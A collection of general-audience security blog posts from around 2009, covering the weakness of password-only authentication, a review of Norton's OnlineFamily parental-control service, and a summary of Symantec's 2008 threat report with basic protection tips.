1. Passwords alone are single factor authentication, and by definition that authentication is weak.
2. We let users choose their own passwords, thereby increasing the likelihood that others can figure out the password.
3. Since people forget passwords, we build mechanisms to let them find out their password or reset it.

In other words, we take a weak authentication mechanism and make it worse. And then we act surprised when it fails.

For years we’ve been telling people to choose complex passwords that can’t easily be guessed.  But most people don’t follow that advice.  And even those who do may be subject to attack because of the poor authentication used to reset passwords.  A good authentication mechanism should not not allow each user to determine the strength of authentication.

Effective alternatives are available.  Among them are key-chain size authentication tokens from RSA and Vasco.  In summary, as part of your login to a site you have to type in the 6 digit number that appears on the device, as well as your username and password (or a PIN).

While it’s easy to understand that Twitter may not want to provide users with authentication tokens (it is a free service after all!), at minimum they could, and should, require two-factor authentication for all users with administrative access.  The amount of damage that could result from an intrusion into a Twitter administration account warrants two-factor authentication.  If Twitter had conducted a risk assessment they would know that.

Security professionals have been pointing out these exact problems with passwords for years.  Is anybody listening?

When it comes to children and the Internet, there is no substitute for parental supervision. It’s certainly not wrong to use parental control software, but parents must understand that software is intended to assist, not do their job for them. The problem is that many vendors don’t seem to appreciate the difference. Thanks to Norton, that’s changing with today’s launch of the OnlineFamily.Norton service.

According to Jody Gibney, Group Product Manager of OnlineFamily.Norton, many parents don’t understand what their children are doing online and only about 20% of parents with kids aged 6-18 use technology to help.

It should be no surprise to parents that kids do a lot online:

• They consume, create, and share web content.
• They socialize one-on-one and in groups.
• Kids who use social media have an average of 145 online friends.
• They often have multiple complex online identities.

It’s no surprise that parents have a hard time keeping up.

Parents also may not realize where the real dangers lie.  While pedophiles have lured children across the Internet, such occurrences are very rare. Much more common is, as Jody put it, “plain kid-on-kid meanness.”  Social media sites allow kids to post hurtful words, images and videos that can result in real-world embarrassment. Parents need to know what sites their kids are using and decide if and how they should monitor it. Rather than simply prohibiting access to sites, Jody suggests that parents negotiate age-appropriate solutions with children.  For example, a teen may be allowed to use Facebook on the condition that they ‘friend’ Mom so that she can see what is being posted.  If the child sets up a second Facebook account, it’s important that Mom have a way of finding out about it.

Some elements of Norton’s approach, like categorizing web sites and reporting on use, are similar to other products, but their philosophy is different.  Norton’s service is designed to encourage dialog and negotiation between parents and children. For example, Norton encourages parents to log in to OnlineFamily’s web-based interface with their children and discuss the various choices and options. The selections made for each child become “house rules” and include web site categories as well as rules relating to the use of instant messaging, what times the Internet can be used, for how long, and what happens when rules are violated.

Most rules and limits can be configured as hard or soft. Hard time limits log the child out after giving a 15 minute warning, while soft time limits simply report the activity. Similarly three options exist for web sites: Monitor use but don’t block, warn the child first but let them proceed to blocked sites, or actively block access to sites that violate the house rules.

Norton’s approach, Jody explained, is to “understand intent, guide online behavior and discuss online activities.” When a web site is blocked, OnlineFamily gives the child options that include “Oops, I made a mistake! Let me go back.” and “I want to tell my parents why I tried to go to this Web site.” There is also an option to dispute the categorization of the site. When a child researching a homework assignment is prevented from accessing a site, he or she can explain why they want access and the request is sent to parents in real-time.

I’m often concerned about the ethical implications of monitoring software and I believe that spying on family members can erode trust and damage relationships. OnlineFamily avoids that issue completely. Not only does it display a notification every time the child logs on, but the child can also click on the application’s icon and display a summary of house rules, including information on what types of activity is being monitored.

Last week I created an account on OnlineFamily.Norton.com while it was still in beta. I downloaded the program and installed it on our family computer. Then I logged into the OnlineFamily web site, added my daughter as a family member, identified which computer account she used and sent an invite to my wife giving her ‘parent’ access. Next I set the rules and explained the system to my daughter.  Overall, I’m impressed. I did run into a few rough edges with the beta, but by the time you read this they will have been fixed.

OnlineFamily.Norton is the first product in this space to actively involve parents and that makes it a winner. It officially launches today at http://Onlinefamily.Norton.com and is free until January 1, 2010. Norton hopes to receive feedback from parents and say they will consider it carefully before deciding on the future pricing model.

Last week Symantec released their 2008 Internet Security Threat Report (ISTR).  The report provides an analysis of worldwide Internet threat activity, vulnerabilities, malicious code, phishing, spam and activity on underground economy servers.

The ISTR contains a lot of interesting information and I’d encourage you to read it — I’m certainly not going to repeat all the findings here.  But if you’re an average Internet user wondering what’s going on, here is my greatly oversimplified summary:

Criminal activity on the Internet continues to increase.  Criminals are targeting your personal information, especially your credit cards and logins to your financial institution. They’re doing so mostly by compromising the web sites you visit and installing nasty stuff that downloads to your computer.

There are a lot of things you could do to protect yourself.  But the real question isn’t what you could do, it’s what should you do.  Here are my top five recommendations:

1. Ensure your anti-virus software is up-to-date.  If you don’t have an AV package, get one.  AVG, BitDefender, Kaspersky, McAfee, Nod32, or Norton/Symantec.  (In alphabetical order if you’re wondering.)  
2. Update your operating system and unless you have a very good reason not to, set it to update automatically.  A lot of systems are being compromised even though a fix was issued more than 6 months ago.
3. Back up data you don’t want to live without. Use removable media (CD, DVD, USB Flash drive, USB Hard drive) or an automatic Internet backup service like Carbonite.
4. Avoid the darker side of the Internet like gambling, porn, pirated software, illegally distributed movies, etc. They’re a haven for malware.
5. Don’t let your kids play on your work computer.

The vast majority of intrusions into personal computers are preventable.  Following these five simple recommendations dramatically reduces your risks.

For business readers, here’s an excerpt from the ISTR:

“Web-based attacks are now the primary vector for malicious activity over the Internet. The continued growth of the Internet and the number of people increasingly using it for an extensive array of activities presents attackers with a growing range of targets as well as various means to launch malicious activity. Within this activity, Symantec has noted that most Web-based attacks are launched against users who visit legitimate websites that have been compromised by attackers in order to serve malicious content. Some of the common techniques used by attackers to compromise a website include exploiting a vulnerable Web application running on the server (by attacking through improperly secured input fields), or exploiting some vulnerability present in the underlying host operating system.”

Sixty-three percent of vulnerabilities documented by Symantec in 2008 affected Web applications. The message to web application developers is clear: Many of you are not paying sufficient attention to security. As a profession, you are failing your customers.

I realize that’s a harsh statement and that in many cases web developers are responding to downward pressures on price and unrealistically short development timeframes.  But as a profession it’s time to step up to the security challenge and start designing web applications that resist and even tolerate some intrusions while still protecting sensitive information and users. Those users, after all, are your customer’s customers.

We must start paying more attention to security throughout the software development lifecycle.  That includes ensuring security requirements are identified along with other functional requirements for new applications.  In fact one of the problems is that we still consider security requirements somehow separate from ‘functional’ or ‘business’ requirements.  They’re not.

Perhaps this is one space where the open source community could play an important role.  Most web applications have common requirements like user account maintenance, authentication, priviledge management, session control and input validation.Yet every application developer seems to create their own and many make the same mistakes. Perhaps it is time for an open web application framework that handles these critical functions…and does it right.